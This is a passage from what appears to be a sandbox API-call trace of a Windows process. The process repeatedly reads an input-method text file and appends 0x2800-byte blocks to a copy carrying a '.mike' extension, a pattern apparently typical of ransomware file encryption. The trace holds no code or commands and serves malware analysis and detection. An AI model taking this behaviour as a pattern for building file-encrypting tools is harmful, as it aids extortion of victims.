(x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.773] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.773] GetFileType (hFile=0x284) returned 0x1 [0129.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.773] GetFileType (hFile=0x284) returned 0x1 [0129.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.775] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.775] GetFileType (hFile=0x284) returned 0x1 [0129.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.775] GetFileType (hFile=0x284) returned 0x1 [0129.775] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xbba20 [0129.775] WriteFile (in: hFile=0x284, lpBuffer=0x21457e4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21457e4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.775] CloseHandle (hObject=0x284) returned 1 [0129.776] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.776] GetFileType (hFile=0x284) returned 0x1 [0129.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.776] GetFileType (hFile=0x284) returned 0x1 [0129.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.777] GetFileType (hFile=0x284) returned 0x1 [0129.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.778] GetFileType (hFile=0x284) returned 0x1 [0129.778] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xbe220 [0129.778] WriteFile (in: hFile=0x284, lpBuffer=0x2152854*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2152854*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.779] CloseHandle (hObject=0x284) returned 1 [0129.779] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.779] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.779] GetFileType (hFile=0x284) returned 0x1 [0129.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.779] GetFileType (hFile=0x284) returned 0x1 [0129.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.780] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.780] GetFileType (hFile=0x284) returned 0x1 [0129.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.780] GetFileType (hFile=0x284) returned 0x1 [0129.780] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xc0a20 [0129.781] WriteFile (in: hFile=0x284, lpBuffer=0x215f8c4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x215f8c4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.781] CloseHandle (hObject=0x284) returned 1 [0129.782] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.782] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.782] GetFileType (hFile=0x284) returned 0x1 [0129.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.782] GetFileType (hFile=0x284) returned 0x1 [0129.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.783] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.783] GetFileType (hFile=0x284) returned 0x1 [0129.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.783] GetFileType (hFile=0x284) returned 0x1 [0129.783] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xc3220 [0129.784] WriteFile (in: hFile=0x284, lpBuffer=0x216c934*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x216c934*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.784] CloseHandle (hObject=0x284) returned 1 [0129.784] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.784] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.784] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.784] GetFileType (hFile=0x284) returned 0x1 [0129.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.784] GetFileType (hFile=0x284) returned 0x1 [0129.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.785] GetFileType (hFile=0x284) returned 0x1 [0129.785] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.785] GetFileType (hFile=0x284) returned 0x1 [0129.785] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xc5a20 [0129.785] WriteFile (in: hFile=0x284, lpBuffer=0x21799a4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21799a4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.786] CloseHandle (hObject=0x284) returned 1 [0129.786] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.786] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.786] GetFileType (hFile=0x284) returned 0x1 [0129.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.786] GetFileType (hFile=0x284) returned 0x1 [0129.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.787] GetFileType (hFile=0x284) returned 0x1 [0129.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.787] GetFileType (hFile=0x284) returned 0x1 [0129.787] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xc8220 [0129.787] WriteFile (in: hFile=0x284, lpBuffer=0x2186a14*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2186a14*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.787] CloseHandle (hObject=0x284) returned 1 [0129.787] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.788] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.788] GetFileType (hFile=0x284) returned 0x1 [0129.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.788] GetFileType (hFile=0x284) returned 0x1 [0129.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.789] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.789] GetFileType (hFile=0x284) returned 0x1 [0129.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.789] GetFileType (hFile=0x284) returned 0x1 [0129.789] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xcaa20 [0129.789] WriteFile (in: hFile=0x284, lpBuffer=0x2193a84*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2193a84*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.789] CloseHandle (hObject=0x284) returned 1 [0129.789] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.790] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.790] GetFileType (hFile=0x284) returned 0x1 [0129.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.790] GetFileType (hFile=0x284) returned 0x1 [0129.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.791] GetFileType (hFile=0x284) returned 0x1 [0129.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.791] GetFileType (hFile=0x284) returned 0x1 [0129.791] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xcd220 [0129.791] WriteFile (in: hFile=0x284, lpBuffer=0x21a0af4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21a0af4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.791] CloseHandle (hObject=0x284) returned 1 [0129.791] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.791] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.792] GetFileType (hFile=0x284) returned 0x1 [0129.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.792] GetFileType (hFile=0x284) returned 0x1 [0129.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.793] GetFileType (hFile=0x284) returned 0x1 [0129.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.793] GetFileType (hFile=0x284) returned 0x1 [0129.793] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xcfa20 [0129.793] WriteFile (in: hFile=0x284, lpBuffer=0x21adb64*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21adb64*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.793] CloseHandle (hObject=0x284) returned 1 [0129.793] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.793] GetFileType (hFile=0x284) returned 0x1 [0129.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.794] GetFileType (hFile=0x284) returned 0x1 [0129.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.810] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.810] GetFileType (hFile=0x284) returned 0x1 [0129.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.810] GetFileType (hFile=0x284) returned 0x1 [0129.810] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xd2220 [0129.810] WriteFile (in: hFile=0x284, lpBuffer=0x2107054*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2107054*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.811] CloseHandle (hObject=0x284) returned 1 [0129.811] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.811] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.811] GetFileType (hFile=0x284) returned 0x1 [0129.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.811] GetFileType (hFile=0x284) returned 0x1 [0129.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.812] GetFileType (hFile=0x284) returned 0x1 [0129.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.812] GetFileType (hFile=0x284) returned 0x1 [0129.812] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xd4a20 [0129.813] WriteFile (in: hFile=0x284, lpBuffer=0x21140c4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21140c4*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.813] CloseHandle (hObject=0x284) returned 1 [0129.813] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.813] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.813] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.813] GetFileType (hFile=0x284) returned 0x1 [0129.813] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.813] GetFileType (hFile=0x284) returned 0x1 [0129.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.829] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.829] GetFileType (hFile=0x284) returned 0x1 [0129.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0129.829] GetFileType (hFile=0x284) returned 0x1 [0129.829] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xd7220 [0129.830] WriteFile (in: hFile=0x284, lpBuffer=0x2121134*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2121134*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0129.830] CloseHandle (hObject=0x284) returned 1 [0129.830] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt", lpFilePart=0x0) returned 0x58 [0129.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0129.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedQuanPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedquanpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0129.830] GetFileType (hFile=0x284) returned 0x1 [0129.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0129.830] GetFileType (hFile=0x284) returned 0x1 [0129.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0129.831] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows 